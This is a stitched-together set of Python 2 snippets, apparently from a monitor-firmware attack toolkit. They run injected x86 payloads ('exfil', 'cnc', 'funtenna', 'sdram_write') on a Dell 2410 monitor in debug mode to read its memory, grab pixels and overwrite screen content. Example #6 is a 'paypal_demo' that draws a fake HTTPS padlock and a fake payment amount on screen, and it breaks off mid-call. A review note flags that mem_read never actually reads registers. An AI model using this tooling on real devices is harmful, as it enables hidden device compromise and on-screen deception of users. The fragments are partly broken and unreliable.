示例#1
def memcpy(dev, dst_seg, src_seg, dst_off, src_off, len):
    """Patch the "memcpy" payload template with the arguments and run it.

    Every placeholder word in the template is replaced with one argument,
    then the patched payload is handed to execute_payload() together with
    the constant 0x600.

    Args:
        dev: device handle, passed through to execute_payload().
        dst_seg: replaces placeholder 0xadad (presumably the destination
            segment; confirm against the payload source).
        src_seg: replaces placeholder 0xabab.
        dst_off: replaces placeholder 0xacac.
        src_off: replaces placeholder 0xaeae.
        len: replaces placeholder 0xafaf. The name shadows the builtin
            len() inside this function; it is kept because it is part of
            the signature.
    """
    # (placeholder, replacement) pairs, applied in this order.
    substitutions = (
        (0xadad, dst_seg),
        (0xabab, src_seg),
        (0xacac, dst_off),
        (0xaeae, src_off),
        (0xafaf, len),
    )
    payload = X86Payload("memcpy")
    for marker, value in substitutions:
        payload.replace_word(marker, value)
    execute_payload(dev, payload, 0x600)
示例#2
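def mem_read(dev, segment=0xf000, start_offset=0, l=0x2000):
    """Read device memory back through the "exfil" payload and dev.reg_read().

    For every sixth offset in [start_offset, start_offset + l) a copy of
    the payload is patched with that offset and executed, after which the
    result is meant to be collected from device registers.

    Args:
        dev: device handle; must provide reg_read() and be accepted by
            execute_payload().
        segment: replaces placeholder 0xadad in the payload.
        start_offset: first offset patched into placeholder 0xacac.
        l: number of offsets to cover, walked in steps of 6.

    Returns:
        The concatenation of everything reg_read() returned. If an
        Exception is raised part-way, its message is printed and whatever
        was collected so far is returned.
    """
    extracted_mem = ''
    end_offset = start_offset + l
    payload = X86Payload("exfil")
    payload.replace_word(0xadad, segment)
    try:
        for offset in xrange(start_offset, end_offset, 6):
            # Patch a copy so the template keeps its 0xacac placeholder.
            new = copy.deepcopy(payload)
            new.replace_word(0xacac, offset)
            execute_payload(dev, new, 0x500)
            time.sleep(0.03)
            # NOTE(review): both bounds of this range are FREE_REG_ADDR_END,
            # so the range is empty, reg_read() is never called and the
            # function returns '' as written. The lower bound is presumably
            # meant to be the start of the same register window (three
            # 2-byte registers would match the step of 6 above). Confirm
            # against the module's constants before changing it.
            for reg in range(FREE_REG_ADDR_END, FREE_REG_ADDR_END, 2):
                extracted_mem += dev.reg_read(reg)
                time.sleep(0.03)
    except Exception as e:
        print str(e)
    # Returning here rather than from a `finally` clause keeps the
    # best-effort partial result for ordinary errors, but no longer
    # swallows KeyboardInterrupt / SystemExit.
    return extracted_mem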
示例#3
def sdram_write(dev,
                src_seg=0,
                src_off=0,
                reg_hi=0,
                reg_lo=0,
                height=0,
                width=0,
                stride=0,
                ram_write_addr=0x690):
    """Patch the "sdram_write" payload template with the arguments and run it.

    Args:
        dev: device handle, passed through to execute_payload().
        src_seg: replaces placeholder 0xadad.
        src_off: replaces placeholder 0xacac.
        reg_hi: replaces placeholder 0xbcbc.
        reg_lo: replaces placeholder 0xbebe.
        height: replaces placeholder 0xaeae.
        width: replaces placeholder 0xafaf.
        stride: replaces placeholder 0xbdbd.
        ram_write_addr: third argument to execute_payload() (presumably
            the address the payload is written to; confirm against
            execute_payload()).
    """
    # (placeholder, replacement) pairs, applied in this order.
    substitutions = (
        (0xacac, src_off),
        (0xadad, src_seg),
        (0xaeae, height),
        (0xafaf, width),
        (0xbdbd, stride),
        (0xbcbc, reg_hi),
        (0xbebe, reg_lo),
    )
    payload = X86Payload("sdram_write")
    for marker, value in substitutions:
        payload.replace_word(marker, value)
    execute_payload(dev, payload, ram_write_addr)
示例#4
def grab_pixel(dev, vertical_coord, horizontal_coord, memory_dump_addr=0x4000):
    """Run the "grab_pixel" payload and return the dumped R, G, B words.

    Args:
        dev: device handle, passed to execute_payload() and mem_read().
        vertical_coord: replaces placeholder 0xaeae.
        horizontal_coord: replaces placeholder 0xbebe.
        memory_dump_addr: replaces placeholder 0xcece; also the address
            the six result bytes are read back from.

    Returns:
        A dict with keys 'R', 'G' and 'B'. Each value is the one-element
        tuple produced by struct.unpack('<H', ...) on two bytes of the
        dump, not a bare integer.

    Raises:
        struct.error: if mem_read() returns fewer than six bytes.
    """
    payload = X86Payload("grab_pixel")
    for marker, value in ((0xaeae, vertical_coord),
                          (0xbebe, horizontal_coord),
                          (0xcece, memory_dump_addr)):
        payload.replace_word(marker, value)
    execute_payload(dev, payload, 0x600)

    # mem_read() takes the address as a high word (segment) and a low
    # word (offset).
    dump = mem_read(dev,
                    segment=memory_dump_addr >> 16,
                    start_offset=memory_dump_addr & 0xffff,
                    l=0x6)

    # Two little-endian bytes per channel, in R, G, B order.
    channels = {}
    for index, channel in enumerate(('R', 'G', 'B')):
        first = 2 * index
        channels[channel] = struct.unpack('<H', dump[first:first + 2])
    return channels
#!/usr/bin/python2
import protocol
import delltools
import binascii
from payload import X86Payload

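# Run the "show_debug_irq" payload on the monitor and print the 16-bit value
# read back from register 0x3a5a.
payload = X86Payload("show_debug_irq")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()
try:
    delltools.execute_payload(dell, payload, 0x500)
    raw = dell.reg_read(0x3a5a)
    # Combine the first two returned bytes, low byte first.
    value = ord(raw[0]) | (ord(raw[1]) << 8)
    print "The value at 0x3a5a is: %s" % hex(value)
finally:
    # Always switch debug mode off again, so a failed payload or register
    # read does not leave the monitor in debug mode.
    dell.debug_off()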
示例#6
# Command-line switches, one dict per option: 'args' holds the flag
# spellings and 'kwargs' the keyword arguments for add_argument().
ARGS = [
    {
        'args': ('--paypal_demo', '-p'),
        'kwargs': {'action': 'store_true', 'help': "do the paypal_demo"},
    },
]

parser = argparse.ArgumentParser(description='patch vsync interrupt')
for spec in ARGS:
    flags, options = spec['args'], spec['kwargs']
    parser.add_argument(*flags, **options)

args = parser.parse_args()

# Build the "cnc" payload, then set up the monitor connection and switch
# debug mode on.
payload = X86Payload("cnc")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()

# Demo branch selected by --paypal_demo / -p: uploads two images to the
# monitor and draws them with put_image().
# NOTE(review): this listing is cut off in the middle of the final
# put_image() call, so the rest of the branch is not visible here.
# NOTE(review): images drawn this way come from the monitor, not from the
# host, so a padlock shown on screen presumably says nothing about the
# browser's real TLS state.
if args.paypal_demo:
    # Upload the lock image (third argument 0x600000) and draw it; 0x63 and
    # 0x4a are presumably the screen position. Confirm against put_image().
    lock_image = DellImage("lock_https.gif")
    lock_metainfo, _ = delltools.upload_single_image(dell, lock_image,
                                                     0x600000)
    delltools.put_image(dell, lock_metainfo, 0x63, 0x4a)
    time.sleep(2)
    # Second image: it is given 255 - lock_image.colors as its second
    # constructor argument and uploaded with clut_offset=lock_image.colors,
    # presumably so its palette entries follow the lock image's. Confirm.
    amount_image = DellImage("amount_image.png", 255 - lock_image.colors)
    amount_metainfo, _ = delltools.upload_single_image(
        dell, amount_image, 0x600000, clut_offset=lock_image.colors)
    delltools.put_image(dell,
示例#7
def transfer_clut(dev, clut_table, clut_low=0x7000):
    """Write clut_table to the device and run the "transfer_clut" payload.

    The table is written with bulk_write_data() at clut_low after the
    payload has been patched and before it is executed.

    Args:
        dev: device handle, passed to bulk_write_data() and
            execute_payload().
        clut_table: data handed to bulk_write_data().
        clut_low: replaces placeholder 0xacac and is the address given to
            bulk_write_data().
    """
    clut_high = 0x0000  # always zero here; replaces placeholder 0xadad
    payload = X86Payload("transfer_clut")
    for marker, value in ((0xadad, clut_high), (0xacac, clut_low)):
        payload.replace_word(marker, value)
    bulk_write_data(dev, clut_low, clut_table)
    execute_payload(dev, payload, 0x600)
示例#8
#!/usr/bin/python2
import time
import protocol
import delltools
from payload import X86Payload

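# Run the "funtenna" payload on the monitor, wait ten seconds, then leave
# debug mode.
payload = X86Payload("funtenna")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()
try:
    delltools.execute_payload(dell, payload, 0x500)
    time.sleep(10)
finally:
    # Always switch debug mode off again, so a failed execute_payload() or
    # an interrupted wait does not leave the monitor in debug mode.
    dell.debug_off()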